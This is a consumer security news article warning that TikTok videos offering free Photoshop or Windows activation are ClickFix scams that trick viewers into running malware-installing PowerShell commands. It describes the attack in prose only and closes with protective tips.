If a TikTok 'tech tip' tells you to paste code, it's a scam. Here's what's really happening
TikTok has become a popular platform for spreading malicious information and malware, with free software serving as the bait. According to Senior ISC Handler Xavier Mertens, who recently warned about this trend on the SANS Institute's Internet Storm Center website, TikTok is being exploited by threat actors to spread ClickFix social engineering techniques.
ClickFix is a particularly nasty social engineering technique that tries to bypass traditional anti-phishing protections by tricking users into "hacking" themselves. This method uses clever instructions and fake tutorials to convince victims to download malware onto their systems. In the case of TikTok, scammers are using the platform to promote fake tech tips and tutorials that promise easy ways to activate popular software like Photoshop or Microsoft Windows without a license.
In one example posted by Mertens, a scammer claims to provide an easy way to activate Photoshop for free. The victim is asked to start PowerShell as an administrator and trigger one line of code, which then executes "Updater.exe," a Trojan designed to steal credentials and system information. An additional shellcode is also launched in memory.
ZDNET explored TikTok for similar videos and was surprised by how many were live. For instance, we found a screenshot promoting a fake way to download and install Adobe Photoshop without the need for a license. Other examples included fake, free ways to license Microsoft Windows.
ClickFix is not a new tactic, but it's becoming increasingly popular as a method of infiltrating networks, stealing data, and deploying malware. According to Microsoft's latest Digital Defense report, Clickfix tactics have been recorded as a method of initial access in 47% of attacks since 2024, ahead of phishing and password "spray and pray" attack methods.
So, how can you protect yourself against ClickFix attacks? The first step is to be cautious when executing commands on your device. If you're unsure about the source of the code or its true purpose, especially if you find it on social media where it's unlikely to be vetted, don't execute it.
Additionally, stay suspicious and educate yourself and others about this social engineering method. Share information with friends and family, and encourage them to do the same. By being aware of ClickFix tactics and taking necessary precautions, you can significantly reduce your risk of falling victim to these attacks.
How ClickFix works
ClickFix is a type of social engineering attack that uses clever instructions and fake tutorials to convince victims to download malware onto their systems. The attack typically involves the following steps:
- Scammers create fake tutorials or videos that promise easy ways to activate popular software, such as Photoshop or Microsoft Windows.
- The tutorials provide step-by-step instructions on how to "fix" a minor technical glitch or use paid software for free.
- The victim is asked to execute a command on their device, such as copying and pasting a snippet of code into a command prompt.
- The malicious payload is deployed and executed, which can include information stealers, Remote Access Trojans (RATs), ransomware, and worms.
By understanding how ClickFix works, you can take steps to protect yourself against these attacks.
How to protect yourself against ClickFix attacks
Here are some tips to help you protect yourself against ClickFix attacks:
- Be cautious when executing commands on your device. If you're unsure about the source of the code or its true purpose, especially if it comes from social media.
- Don't execute a command on your device if it's not legitimate and you can't verify its authenticity.
- Keep your software up to date, including operating systems, browsers, and antivirus programs.
- Use strong passwords and enable two-factor authentication whenever possible.
- Back up your important data regularly to prevent loss in case of a ransomware attack.
By following these tips and staying informed about ClickFix tactics, you can significantly reduce your risk of falling victim to these attacks.